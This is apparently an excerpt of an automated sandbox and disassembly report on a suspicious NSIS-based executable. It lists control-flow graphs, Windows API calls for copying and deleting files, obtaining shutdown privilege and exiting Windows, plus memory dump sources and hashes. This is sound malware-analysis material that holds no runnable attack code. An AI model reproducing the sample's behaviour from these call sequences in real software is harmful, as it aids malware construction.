                                                                                                            • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,00435000,00000000,00000006,?,00000006,00000008,0000000A), ref: 00403867
                                                                                                            • lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,00436800,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,00435000,00000000,00000006,?,00000006,00000008,0000000A), ref: 00403873
                                                                                                            • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 0040388F
                                                                                                            • DeleteFileW.KERNEL32(00420EE8,00420EE8,?,0042B000,00000008,?,00000006,00000008,0000000A), ref: 004038E9
                                                                                                            • CopyFileW.KERNEL32(C:\Users\user\Desktop\ZaRP7yvL1J.exe,00420EE8,00000001,?,00000006,00000008,0000000A), ref: 004038FD
                                                                                                            • CloseHandle.KERNEL32(00000000,00420EE8,00420EE8,?,00420EE8,00000000,?,00000006,00000008,0000000A), ref: 0040392A
                                                                                                            • GetCurrentProcess.KERNEL32(00000028,0000000A,00000006,00000008,0000000A), ref: 00403959
                                                                                                            • OpenProcessToken.ADVAPI32(00000000), ref: 00403960
                                                                                                            • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403975
                                                                                                            • AdjustTokenPrivileges.ADVAPI32 ref: 00403998
                                                                                                            • ExitWindowsEx.USER32(00000002,80040002), ref: 004039BD
                                                                                                            • ExitProcess.KERNEL32 ref: 004039E0
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2362970731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.2362935906.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2362987698.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2363002050.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2363002050.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2363002050.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2363002050.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2363068605.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_ZaRP7yvL1J.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: lstrcat$FileProcess$Exit$CurrentDeleteDirectoryEnvironmentHandlePathTempTokenVariableWindows$AddressAdjustCharCloseCommandCopyErrorInfoInitializeLineLookupModeModuleNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrcmpilstrcpynlstrlen
                                                                                                            • String ID: .tmp$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop\ZaRP7yvL1J.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
                                                                                                            • API String ID: 3441113951-3140688606
                                                                                                            • Opcode ID: e11a689ec9d555b5fe2f652178506891ef29a00bc77516d82e2752c077597b55
                                                                                                            • Instruction ID: dafc1af32610b20ef8647c0cf6a3faef20d76686829591872cbc6ab955e55f97
                                                                                                            • Opcode Fuzzy Hash: e11a689ec9d555b5fe2f652178506891ef29a00bc77516d82e2752c077597b55
                                                                                                            • Instruction Fuzzy Hash: 4DD1F571600310ABE7206F759D49A3B3AECEB4070AF50443FF981B62D2DB7D8956876E

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 139 404dcc-404e18 GetDlgItem * 2 140 405039-405040 139->140 141 404e1e-404eb2 GlobalAlloc LoadBitmapW SetWindowLongW ImageList_Create ImageList_AddMasked SendMessageW * 2 139->141 142 405042-405052 140->142 143 405054 140->143 144 404ec1-404ec8 DeleteObject 141->144 145 404eb4-404ebf SendMessageW 141->145 146 405057-405060 142->146 143->146 147 404eca-404ed2 144->147 145->144 148 405062-405065 146->148 149 40506b-405071 146->149 150 404ed4-404ed7 147->150 151 404efb-404eff 147->151 148->149 152 40514f-405156 148->152 155 405080-405087 149->155 156 405073-40507a 149->156 153 404ed9 150->153 154 404edc-404ef9 call 40640a SendMessageW * 2 150->154 151->147 157 404f01-404f2d call 40435f * 2 151->157 158 4051c7-4051cf 152->158 159 405158-40515e 152->159 153->154 154->151 161 405089-40508c 155->161 162 4050fc-4050ff 155->162 156->152 156->155 190 404f33-404f39 157->190 191 404ff8-40500b GetWindowLongW SetWindowLongW 157->191 167 4051d1-4051d7 SendMessageW 158->167 168 4051d9-4051e0 158->168 164 405164-40516e 159->164 165 4053af-4053c1 call 4043c6 159->165 170 405097-4050ac call 404d1a 161->170 171 40508e-405095 161->171 162->152 166 405101-40510b 162->166 164->165 173 405174-405183 SendMessageW 164->173 175 40511b-405125 166->175 176 40510d-405119 SendMessageW 166->176 167->168 177 4051e2-4051e9 168->177 178 405214-40521b 168->178 170->162 200 4050ae-4050bf 170->200 171->162 171->170 173->165 184 405189-40519a SendMessageW 173->184 175->152 186 405127-405131 175->186 176->175 187 4051f2-4051f9 177->187 188 4051eb-4051ec ImageList_Destroy 177->188 182 405371-405378 178->182 183 405221-40522d call 4011ef 178->183 182->165 195 40537a-405381 182->195 211 40523d-405240 183->211 212 40522f-405232 183->212 193 4051a4-4051a6 184->193 194 40519c-4051a2 184->194 196 405142-40514c 186->196 197 405133-405140 186->197 198 405202-40520e 187->198 199 4051fb-4051fc GlobalFree 187->199 188->187 202 404f3c-404f43 190->202 206 405011-405015 191->206 204 4051a7-4051c0 call 401299 SendMessageW 193->204 194->193 194->204 195->165 205 405383-4053ad ShowWindow GetDlgItem ShowWindow 195->205 196->152 197->152 198->178 199->198 200->162 201 4050c1-4050c3 200->201 207 4050c5-4050cc 201->207 208 4050d6 201->208 209 404fd9-404fec 202->209 210 404f49-404f71 202->210 204->158 205->165 214 405017-40502a ShowWindow call 404394 206->214 215 40502f-405037 call 404394 206->215 217 4050d2-4050d4 207->217 218 4050ce-4050d0 207->218 221 4050d9-4050f5 call 40117d 208->221 209->202 225 404ff2-404ff6 209->225 219 404f73-404fa9 SendMessageW 210->219 220 404fab-404fad 210->220 226 405281-4052a5 call 4011ef 211->226 227 405242-40525b call 4012e2 call 401299 211->227 222 405234 212->222 223 405235-405238 call 404d9a 212->223 214->165 215->140 217->221 218->221 219->209 229 404fc0-404fd6 SendMessageW 220->229 230 404faf-404fbe SendMessageW 220->230 221->162 222->223 223->211 225->191 225->206 241 405347-40535b InvalidateRect 226->241 242 4052ab 226->242 247 40526b-40527a SendMessageW 227->247 248 40525d-405263 227->248 229->209 230->209 241->182 243 40535d-40536c call 404ced call 404cd5 241->243 244 4052ae-4052b9 242->244 243->182 249 4052bb-4052ca 244->249 250 40532f-405341 244->250 247->226 251 405265 248->251 252 405266-405269 248->252 254 4052cc-4052d9 249->254 255 4052dd-4052e0 249->255 250->241 250->244 251->252 252->247 252->248 254->255 257 4052e2-4052e5 255->257 258 4052e7-4052f0 255->258 259 4052f5-40532d SendMessageW * 2 257->259 258->259 260 4052f2 258->260 259->250 260->259
                                                                                                            APIs
                                                                                                            • GetDlgItem.USER32(?,000003F9), ref: 00404DE4
                                                                                                            • GetDlgItem.USER32(?,00000408), ref: 00404DEF
                                                                                                            • GlobalAlloc.KERNEL32(00000040,?), ref: 00404E39
                                                                                                            • LoadBitmapW.USER32(0000006E), ref: 00404E4C
                                                                                                            • SetWindowLongW.USER32(?,000000FC,004053C4), ref: 00404E65
                                                                                                            • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404E79
                                                                                                            • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404E8B
                                                                                                            • SendMessageW.USER32(?,00001109,00000002), ref: 00404EA1
                                                                                                            • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404EAD
                                                                                                            • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404EBF
                                                                                                            • DeleteObject.GDI32(00000000), ref: 00404EC2
                                                                                                            • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404EED
                                                                                                            • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404EF9
                                                                                                            • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404F8F
                                                                                                            • SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404FBA
                                                                                                            • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404FCE
                                                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 00404FFD
                                                                                                            • SetWindowLongW.USER32(?,000000F0,00000000), ref: 0040500B
                                                                                                            • ShowWindow.USER32(?,00000005), ref: 0040501C
                                                                                                            • SendMessageW.USER32(?,00000419,00000000,?), ref: 00405119
                                                                                                            • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 0040517E
                                                                                                            • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00405193
                                                                                                            • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 004051B7
                                                                                                            • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 004051D7
                                                                                                            • ImageList_Destroy.COMCTL32(?), ref: 004051EC
                                                                                                            • GlobalFree.KERNEL32(?), ref: 004051FC
                                                                                                            • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00405275
                                                                                                            • SendMessageW.USER32(?,00001102,?,?), ref: 0040531E
                                                                                                            • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 0040532D
                                                                                                            • InvalidateRect.USER32(?,00000000,00000001), ref: 0040534D
                                                                                                            • ShowWindow.USER32(?,00000000), ref: 0040539B
                                                                                                            • GetDlgItem.USER32(?,000003FE), ref: 004053A6
                                                                                                            • ShowWindow.USER32(00000000), ref: 004053AD
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2362970731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.2362935906.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2362987698.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2363002050.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2363002050.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2363002050.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2363002050.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2363068605.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_ZaRP7yvL1J.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                                            • String ID: $M$N
                                                                                                            • API String ID: 1638840714-813528018
                                                                                                            • Opcode ID: fb644b25ca39ae204efa7e1d1243337108994715b0d322cb34e58838b66aab8b
                                                                                                            • Instruction ID: 7f687e55a7f93217ddba54fde82f382d197ef8b4c31ab339cf60f2545021b201
                                                                                                            • Opcode Fuzzy Hash: fb644b25ca39ae204efa7e1d1243337108994715b0d322cb34e58838b66aab8b
                                                                                                            • Instruction Fuzzy Hash: DD028DB0A00609EFDF209F94CD85AAE7BB5FB44354F10807AE611BA2E0C7798D52CF58

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 574 405afa-405b20 call 405dc5 577 405b22-405b34 DeleteFileW 574->577 578 405b39-405b40 574->578 579 405cb6-405cba 577->579 580 405b42-405b44 578->580 581 405b53-405b63 call 4063e8 578->581 582 405c64-405c69 580->582 583 405b4a-405b4d 580->583 589 405b72-405b73 call 405d09 581->589 590 405b65-405b70 lstrcatW 581->590 582->579 585 405c6b-405c6e 582->585 583->581 583->582 587 405c70-405c76 585->587 588 405c78-405c80 call 40672b 585->588 587->579 588->579 598 405c82-405c96 call 405cbd call 405ab2 588->598 593 405b78-405b7c 589->593 590->593 594 405b88-405b8e lstrcatW 593->594 595 405b7e-405b86 593->595 597 405b93-405baf lstrlenW FindFirstFileW 594->597 595->594 595->597 599 405bb5-405bbd 597->599 600 405c59-405c5d 597->600 614 405c98-405c9b 598->614 615 405cae-405cb1 call 405450 598->615 602 405bdd-405bf1 call 4063e8 599->602 603 405bbf-405bc7 599->603 600->582 605 405c5f 600->605 616 405bf3-405bfb 602->616 617 405c08-405c13 call 405ab2 602->617 606 405bc9-405bd1 603->606 607 405c3c-405c4c FindNextFileW 603->607 605->582 606->602 610 405bd3-405bdb 606->610 607->599 613 405c52-405c53 FindClose 607->613 610->602 610->607 613->600 614->587 620 405c9d-405cac call 405450 call 4061ae 614->620 615->579 616->607 621 405bfd-405c06 call 405afa 616->621 625 405c34-405c37 call 405450 617->625 626 405c15-405c18 617->626 620->579 621->607 625->607 629 405c1a-405c2a call 405450 call 4061ae 626->629 630 405c2c-405c32 626->630 629->607 630->607
                                                                                                            APIs
                                                                                                            • DeleteFileW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\,74DF2EE0,00000000), ref: 00405B23
                                                                                                            • lstrcatW.KERNEL32(00425730,\*.*,00425730,?,?,C:\Users\user\AppData\Local\Temp\,74DF2EE0,00000000), ref: 00405B6B
                                                                                                            • lstrcatW.KERNEL32(?,0040A014,?,00425730,?,?,C:\Users\user\AppData\Local\Temp\,74DF2EE0,00000000), ref: 00405B8E
                                                                                                            • lstrlenW.KERNEL32(?,?,0040A014,?,00425730,?,?,C:\Users\user\AppData\Local\Temp\,74DF2EE0,00000000), ref: 00405B94
                                                                                                            • FindFirstFileW.KERNEL32(00425730,?,?,?,0040A014,?,00425730,?,?,C:\Users\user\AppData\Local\Temp\,74DF2EE0,00000000), ref: 00405BA4
                                                                                                            • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405C44
                                                                                                            • FindClose.KERNEL32(00000000), ref: 00405C53
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2362970731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.2362935906.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2362987698.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2363002050.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2363002050.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2363002050.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2363002050.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2363068605.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_ZaRP7yvL1J.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                                            • String ID: 0WB$C:\Users\user\AppData\Local\Temp\$\*.*
                                                                                                            • API String ID: 2035342205-1057503074
                                                                                                            • Opcode ID: 94aee6277fb60bc187ec105b0c3c889327325094ff3d5538513028a918914a00
                                                                                                            • Instruction ID: 490a569b50011677cd34e026f6ab1003dec3a9533e419df12a6715eb2ed0bc70
                                                                                                            • Opcode Fuzzy Hash: 94aee6277fb60bc187ec105b0c3c889327325094ff3d5538513028a918914a00
                                                                                                            • Instruction Fuzzy Hash: 0541BF30805B18A6EB31AB618D89BAF7678EF41718F10817BF801711D2D77C59C29EAE
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2362970731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.2362935906.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2362987698.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2363002050.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2363002050.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2363002050.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2363002050.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2363068605.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_ZaRP7yvL1J.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 35cbb8abcdf375330cdaaed117d7ae66e2d52f36901990e867650d9b3411c4d0
                                                                                                            • Instruction ID: 8a3521d6a9ab1c5b5eb45e3d7957e6eefdd785676f1866d9874d60d9aff9e69c
                                                                                                            • Opcode Fuzzy Hash: 35cbb8abcdf375330cdaaed117d7ae66e2d52f36901990e867650d9b3411c4d0
                                                                                                            • Instruction Fuzzy Hash: 1CF16770D04229CBDF18CFA8C8946ADBBB0FF45305F25816ED856BB281D7386A86DF45
                                                                                                            APIs
                                                                                                            • FindFirstFileW.KERNELBASE(?,00426778,00425F30,00405E0E,00425F30,00425F30,00000000,00425F30,00425F30,?,?,74DF2EE0,00405B1A,?,C:\Users\user\AppData\Local\Temp\,74DF2EE0), ref: 00406736
                                                                                                            • FindClose.KERNEL32(00000000), ref: 00406742
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2362970731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.2362935906.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2362987698.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2363002050.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2363002050.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2363002050.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2363002050.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2363068605.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_ZaRP7yvL1J.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Find$CloseFileFirst
                                                                                                            • String ID: xgB
                                                                                                            • API String ID: 2295610775-399326502
                                                                                                            • Opcode ID: 8f8798618dbeb96281b7e152f222c6bef4cfc1fb78c0b92afc6d3f182eb863fd
                                                                                                            • Instruction ID: 964bfaba6fe47efa91ae3b9d04416f3a0311ddb8c2b0a677c8b566ff70b98767
                                                                                                            • Opcode Fuzzy Hash: 8f8798618dbeb96281b7e152f222c6bef4cfc1fb78c0b92afc6d3f182eb863fd
                                                                                                            • Instruction Fuzzy Hash: 08D012315150205BC2011738BD4C85B7A589F553357228B37B866F61E0C7348C62869C

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 261 403e86-403e98 262 403fd9-403fe8 261->262 263 403e9e-403ea4 261->263 264 404037-40404c 262->264 265 403fea-404032 GetDlgItem * 2 call 40435f SetClassLongW call 40140b 262->265 263->262 266 403eaa-403eb3 263->266 268 40408c-404091 call 4043ab 264->268 269 40404e-404051 264->269 265->264 270 403eb5-403ec2 SetWindowPos 266->270 271 403ec8-403ecb 266->271 283 404096-4040b1 268->283 275 404053-40405e call 401389 269->275 276 404084-404086 269->276 270->271 272 403ee5-403eeb 271->272 273 403ecd-403edf ShowWindow 271->273 278 403f07-403f0a 272->278 279 403eed-403f02 DestroyWindow 272->279 273->272 275->276 298 404060-40407f SendMessageW 275->298 276->268 282 40432c 276->282 287 403f0c-403f18 SetWindowLongW 278->287 288 403f1d-403f23 278->288 284 404309-40430f 279->284 286 40432e-404335 282->286 290 4040b3-4040b5 call 40140b 283->290 291 4040ba-4040c0 283->291 284->282 293 404311-404317 284->293 287->286 296 403fc6-403fd4 call 4043c6 288->296 297 403f29-403f3a GetDlgItem 288->297 290->291 294 4040c6-4040d1 291->294 295 4042ea-404303 DestroyWindow EndDialog 291->295 293->282 299 404319-404322 ShowWindow 293->299 294->295 300 4040d7-404124 call 40640a call 40435f * 3 GetDlgItem 294->300 295->284 296->286 301 403f59-403f5c 297->301 302 403f3c-403f53 SendMessageW IsWindowEnabled 297->302 298->286 299->282 331 404126-40412b 300->331 332 40412e-40416a ShowWindow KiUserCallbackDispatcher call 404381 EnableWindow 300->332 305 403f61-403f64 301->305 306 403f5e-403f5f 301->306 302->282 302->301 310 403f72-403f77 305->310 311 403f66-403f6c 305->311 309 403f8f-403f94 call 404338 306->309 309->296 314 403fad-403fc0 SendMessageW 310->314 316 403f79-403f7f 310->316 311->314 315 403f6e-403f70 311->315 314->296 315->309 317 403f81-403f87 call 40140b 316->317 318 403f96-403f9f call 40140b 316->318 327 403f8d 317->327 318->296 328 403fa1-403fab 318->328 327->309 328->327 331->332 335 40416c-40416d 332->335 336 40416f 332->336 337 404171-40419f GetSystemMenu EnableMenuItem SendMessageW 335->337 336->337 338 4041a1-4041b2 SendMessageW 337->338 339 4041b4 337->339 340 4041ba-4041f9 call 404394 call 403e67 call 4063e8 lstrlenW call 40640a SetWindowTextW call 401389 338->340 339->340 340->283 351 4041ff-404201 340->351 351->283 352 404207-40420b 351->352 353 40422a-40423e DestroyWindow 352->353 354 40420d-404213 352->354 353->284 356 404244-404271 CreateDialogParamW 353->356 354->282 355 404219-40421f 354->355 355->283 357 404225 355->357 356->284 358 404277-4042ce call 40435f GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 356->358 357->282 358->282 363 4042d0-4042e8 ShowWindow call 4043ab 358->363 363->284
                                                                                                            APIs
                                                                                                            • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403EC2
                                                                                                            • ShowWindow.USER32(?), ref: 00403EDF
                                                                                                            • DestroyWindow.USER32 ref: 00403EF3
                                                                                                            • SetWindowLongW.USER32(?,00000000,00000000), ref: 00403F0F
                                                                                                            • GetDlgItem.USER32(?,?), ref: 00403F30
                                                                                                            • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403F44
                                                                                                            • IsWindowEnabled.USER32(00000000), ref: 00403F4B
                                                                                                            • GetDlgItem.USER32(?,00000001), ref: 00403FF9
                                                                                                            • GetDlgItem.USER32(?,00000002), ref: 00404003
                                                                                                            • SetClassLongW.USER32(?,000000F2,?), ref: 0040401D
                                                                                                            • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 0040406E
                                                                                                            • GetDlgItem.USER32(?,00000003), ref: 00404114
                                                                                                            • ShowWindow.USER32(00000000,?), ref: 00404135
                                                                                                            • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00404147
                                                                                                            • EnableWindow.USER32(?,?), ref: 00404162
                                                                                                            • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00404178
                                                                                                            • EnableMenuItem.USER32(00000000), ref: 0040417F
                                                                                                            • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 00404197
                                                                                                            • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 004041AA
                                                                                                            • lstrlenW.KERNEL32(00423728,?,00423728,00000000), ref: 004041D4
                                                                                                            • SetWindowTextW.USER32(?,00423728), ref: 004041E8
                                                                                                            • ShowWindow.USER32(?,0000000A), ref: 0040431C
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2362970731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.2362935906.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2362987698.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2363002050.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2363002050.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2363002050.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2363002050.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2363068605.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_ZaRP7yvL1J.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                                                                            • String ID: (7B
                                                                                                            • API String ID: 3282139019-3251261122
                                                                                                            • Opcode ID: 42b69af187e06dbbd4ac4a762ea4715538cd3e369663267481291b142cb35f12
                                                                                                            • Instruction ID: 1e1a27d6975204c591228116fe5edee23a209105d2649c04e919f1d7e5095d09
                                                                                                            • Opcode Fuzzy Hash: 42b69af187e06dbbd4ac4a762ea4715538cd3e369663267481291b142cb35f12
                                                                                                            • Instruction Fuzzy Hash: 6FC1A2B1644200FBDB216F61EE85D2A3BB8EB94706F40053EFA41B11F1CB7958529B6D

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 366 403ad8-403af0 call 4067c2 369 403af2-403b02 call 40632f 366->369 370 403b04-403b3b call 4062b6 366->370 378 403b5e-403b87 call 403dae call 405dc5 369->378 374 403b53-403b59 lstrcatW 370->374 375 403b3d-403b4e call 4062b6 370->375 374->378 375->374 384 403c19-403c21 call 405dc5 378->384 385 403b8d-403b92 378->385 391 403c23-403c2a call 40640a 384->391 392 403c2f-403c54 LoadImageW 384->392 385->384 386 403b98-403bb2 call 4062b6 385->386 390 403bb7-403bc0 386->390 390->384 395 403bc2-403bc6 390->395 391->392 393 403cd5-403cdd call 40140b 392->393 394 403c56-403c86 RegisterClassW 392->394 408 403ce7-403cf2 call 403dae 393->408 409 403cdf-403ce2 393->409 397 403da4 394->397 398 403c8c-403cd0 SystemParametersInfoW CreateWindowExW 394->398 400 403bd8-403be4 lstrlenW 395->400 401 403bc8-403bd5 call 405cea 395->401 406 403da6-403dad 397->406 398->393 402 403be6-403bf4 lstrcmpiW 400->402 403 403c0c-403c14 call 405cbd call 4063e8 400->403 401->400 402->403 407 403bf6-403c00 GetFileAttributesW 402->407 403->384 412 403c02-403c04 407->412 413 403c06-403c07 call 405d09 407->413 419 403cf8-403d12 ShowWindow call 406752 408->419 420 403d7b-403d83 call 405523 408->420 409->406 412->403 412->413 413->403 427 403d14-403d19 call 406752 419->427 428 403d1e-403d30 GetClassInfoW 419->428 425 403d85-403d8b 420->425 426 403d9d-403d9f call 40140b 420->426 425->409 429 403d91-403d98 call 40140b 425->429 426->397 427->428 432 403d32-403d42 GetClassInfoW RegisterClassW 428->432 433 403d48-403d6b DialogBoxParamW call 40140b 428->433 429->409 432->433 436 403d70-403d79 call 403a28 433->436 436->406
                                                                                                            APIs
                                                                                                              • Part of subcall function 004067C2: GetModuleHandleA.KERNEL32(?,00000020,?,00403517,0000000A), ref: 004067D4
                                                                                                              • Part of subcall function 004067C2: GetProcAddress.KERNEL32(00000000,?), ref: 004067EF
                                                                                                            • lstrcatW.KERNEL32(1033,00423728,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423728,00000000,00000002,C:\Users\user\AppData\Local\Temp\,74DF3420,00435000,00000000), ref: 00403B59
                                                                                                            • lstrlenW.KERNEL32(Call,?,?,?,Call,00000000,00435800,1033,00423728,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423728,00000000,00000002,C:\Users\user\AppData\Local\Temp\), ref: 00403BD9
                                                                                                            • lstrcmpiW.KERNEL32(?,.exe,Call,?,?,?,Call,00000000,00435800,1033,00423728,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423728,00000000), ref: 00403BEC
                                                                                                            • GetFileAttributesW.KERNEL32(Call), ref: 00403BF7
                                                                                                            • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,00435800), ref: 00403C40
                                                                                                              • Part of subcall function 0040632F: wsprintfW.USER32 ref: 0040633C
